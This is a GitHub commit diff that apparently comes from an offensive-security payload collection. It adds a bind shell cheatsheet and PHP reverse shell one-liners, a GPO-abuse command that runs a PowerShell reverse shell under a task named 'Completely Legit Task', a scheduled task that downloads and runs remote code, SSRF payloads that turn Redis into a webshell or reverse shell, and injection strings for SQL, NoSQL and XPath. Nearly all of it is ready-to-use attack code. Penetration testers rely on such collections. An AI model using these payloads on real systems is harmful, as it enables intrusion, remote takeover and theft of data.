Bind shell cheatsheet (Fix #194)

yanweibing · May 24, 2020 · 4ca5e71 · 4ca5e71
1 parent c734586
commit 4ca5e71
Show file tree

Hide file tree

Showing 10 changed files with 134 additions and 13 deletions.
diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
@@ -4,10 +4,15 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Prerequisites](#prerequisites)
 * [Exploitation](#exploitation)
 * [References](#references)
 
+## Tools
+
+* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/)
+
 ## Prerequisites
 
 * BURP HEADER> `Origin: https://evil.com`

diff --git a/Command Injection/README.md b/Command Injection/README.md
@@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
 
 ### Bypass characters filter via hex encoding
 
-linux
-```
+Linux
+
+```powershell
 swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 /etc/passwd
 
@@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
 
 swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 root:x:0:0:root:/root:/bin/bash
-
 ```
 
 ### Bypass characters filter
 
 Commands execution without backslash and slash - linux bash
 
-```
+```powershell
 swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
-/
 
 swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
 root:x:0:0:root:/root:/bin/bash
 
 swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
-/
-
 swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
-/
-
 swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 root:x:0:0:root:/root:/bin/bash
-
 ```
 
 ### Bypass Blacklisted words

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -427,7 +427,23 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent
 SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
 ```
 
-Abuse GPO with PowerView
+Abuse GPO with **pyGPOAbuse**
+
+```powershell
+git clone https://github.com/Hackndo/pyGPOAbuse
+# Add john user to local administrators group (Password: H4x00r123..)
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+
+# Reverse shell example
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
+    -powershell \ 
+    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
+    -taskname "Completely Legit Task" \
+    -description "Dis is legit, pliz no delete" \ 
+    -user
+```
+
+Abuse GPO with **PowerView**
 
 ```powershell
 # Enumerate GPO

diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md
@@ -0,0 +1,71 @@
+# Bind Shell
+
+## Summary
+
+* [Reverse Shell](#reverse-shell)
+    * [Perl](#perl)
+    * [Python](#python)
+    * [PHP](#php)
+    * [Ruby](#ruby)
+    * [Netcat Traditional](#netcat-traditional)
+    * [Netcat OpenBsd](#netcat-openbsd)
+    * [Ncat](#ncat)
+    * [Socat](#socat)
+    * [Powershell](#powershell)
+
+
+## Perl
+
+```perl
+perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
+bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
+close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
+```
+
+## PHP
+
+```php
+php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
+socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
+$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
+    socket_write($cl,$m,strlen($m));}}'
+```
+
+## Ruby
+
+```ruby
+ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
+```
+
+## Netcat Traditional
+
+```powershell
+nc -nlvp 51337 -e /bin/bash
+```
+
+## Netcat OpenBsd
+
+```powershell
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
+```
+
+## Socat
+
+```powershell
+user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 
+user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
+```
+
+## Powershell
+
+```powershell
+https://github.com/besimorhino/powercat
+
+# Victim (listen)
+. .\powercat.ps1
+powercat -l -p 7002 -ep
+
+# Connect from attacker
+. .\powercat.ps1
+powercat -c 127.0.0.1 -p 7002
+```
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
@@ -154,6 +154,9 @@ sshuttle -vvr username@pivot_host 10.2.2.0/24
 
 # using a private key
 $ sshuttle -vvr [email protected] 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 
+
+# -x == exclude some network to not transmit over the tunnel
+# -x x.x.x.x.x/24
 ```
 
 ## chisel

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -114,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
 
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
+php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
+php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
 ```
 
 ```bash

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
@@ -27,8 +27,11 @@
 Basic authentication bypass using not equal ($ne) or greater ($gt)
 
 ```json
-in URL
+in DATA
 username[$ne]=toto&password[$ne]=toto
+login[$regex]=a.*&pass[$ne]=lol
+login[$gt]=admin&login[$lt]=test&pass[$ne]=1
+login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
 
 in JSON
 {"username": {"$ne": null}, "password": {"$ne": null}}

diff --git a/SQL Injection/README.md b/SQL Injection/README.md
@@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including:
   * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
   * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
 * [Authentication bypass](#authentication-bypass)
+  * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
 * [Polyglot injection](#polyglot-injection-multicontext)
 * [Routed injection](#routed-injection)
 * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
@@ -365,7 +366,7 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 
-## Authentication Bypass (Raw MD5)
+## Authentication Bypass (Raw MD5 SHA1)
 
 When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
 
@@ -377,6 +378,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO
 
 ```php
 md5("ffifdyop", true) = 'or'6�]��!r,��b
+sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
 ```
 
 Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
@@ -31,6 +31,7 @@
   * [gopher://](#gopher)
   * [netdoc://](#netdoc)
 * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
+* [SSRF exploiting Redis](#ssrf-exploiting-redis)
 * [SSRF to XSS](#ssrf-to-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
@@ -388,6 +389,24 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
 | value data            | (n bytes) |    | /tmp/test.py   |   |
 
 
+## SSRF exploiting Redis
+
+> Redis is a database system that stores everything in RAM
+
+```powershell
+# Getting a webshell
+url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
+url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
+url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
+url=dict://127.0.0.1:6379/SAVE
+
+# Getting a PHP reverse shell
+gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
+gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
+gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22
+gopher://127.0.0.1:6379/_save
+```
+
 ## SSRF to XSS 
 
 by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)

diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
@@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y
 ' and count(/*)=1 and '1'='1
 ' and count(/@*)=1 and '1'='1
 ' and count(/comment())=1 and '1'='1
+search=')] | //user/*[contains(*,'
+search=Har') and contains(../password,'c
+search=Har') and starts-with(../password,'c
 ```
 
 ## Blind Exploitation